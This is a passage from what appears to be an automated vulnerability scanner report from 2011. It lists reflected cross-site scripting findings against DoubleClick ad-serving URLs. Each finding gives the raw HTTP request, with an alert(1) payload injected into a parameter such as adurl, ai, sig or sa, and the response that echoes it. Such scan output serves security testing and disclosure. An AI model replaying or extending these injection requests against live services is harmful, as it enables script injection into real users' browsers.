Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 18:52:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1d3/%2a/c%3B233911573%3B0-0%3B0%3B57808600%3B3454-728/90%3B40306455/40324242/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lae9b3"-alert(1)-"8421c6bfdc2&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5j ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ab7c"-alert(1)-"ad8c3af37fd was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=3ab7c"-alert(1)-"ad8c3af37fd HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7495
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:05:07 GMT
Expires: Thu, 03 Feb 2011 16:05:07 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=3ab7c"-alert(1)-"ad8c3af37fdhttp://content.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html?offer=ssedge"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscript ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff78a"-alert(1)-"3582cf30a1 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQff78a"-alert(1)-"3582cf30a1&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=;ord=1859536705? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:03:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7521
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... h4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQff78a"-alert(1)-"3582cf30a1&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=http%3a%2f%2fcontent.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html%3Foffer%3Dssedge"); var fscUrl = u ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69442"-alert(1)-"07e6bcbb79d was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-410367935223407369442"-alert(1)-"07e6bcbb79d&adurl=;ord=1859536705? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:04:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7519
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... ImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-410367935223407369442"-alert(1)-"07e6bcbb79d&adurl=http%3a%2f%2fcontent.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html%3Foffer%3Dssedge"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = "";
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3c2d"-alert(1)-"a12e235cd32 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1c3c2d"-alert(1)-"a12e235cd32&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=;ord=1859536705? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:04:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7521
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... YXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1c3c2d"-alert(1)-"a12e235cd32&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=http%3a%2f%2fcontent.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html%3Foffer%3Dssedge"); var fscUrl = url; v ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eedea"-alert(1)-"b4205954787 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQeedea"-alert(1)-"b4205954787&client=ca-pub-4103679352234073&adurl=;ord=1859536705? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:04:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7519
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQeedea"-alert(1)-"b4205954787&client=ca-pub-4103679352234073&adurl=http%3a%2f%2fcontent.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html%3Foffer%3Dssedge"); var fscUrl = url; var fscUrlClickTagFound = false; var wm ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 578f1"-alert(1)-"9cb53d4b6d7 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L578f1"-alert(1)-"9cb53d4b6d7&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=;ord=1859536705? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:03:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7527
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1db/%2a/j%3B235044966%3B1-0%3B0%3B58876509%3B3454-728/90%3B40290298/40308085/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=L578f1"-alert(1)-"9cb53d4b6d7&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1s ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69f57'-alert(1)-'ca7e6a01360 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=69f57'-alert(1)-'ca7e6a01360 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7504
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:06:04 GMT
Expires: Thu, 03 Feb 2011 16:06:04 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... z0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=69f57'-alert(1)-'ca7e6a01360https://www.ally.com/bank/interest-checking-account/index.html?CP=57865895;39213494\"> ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48315"-alert(1)-"6e66920d7bf was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=48315"-alert(1)-"6e66920d7bf HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7504
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:05:59 GMT
Expires: Thu, 03 Feb 2011 16:05:59 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... z0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=48315"-alert(1)-"6e66920d7bfhttps://www.ally.com/bank/interest-checking-account/index.html?CP=57865895;39213494"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9569'-alert(1)-'6b525c8dbf5 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAEc9569'-alert(1)-'6b525c8dbf5&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7574
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... naAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAEc9569'-alert(1)-'6b525c8dbf5&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B40155600\"> ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 417c6"-alert(1)-"e33aa584cf5 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE417c6"-alert(1)-"e33aa584cf5&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
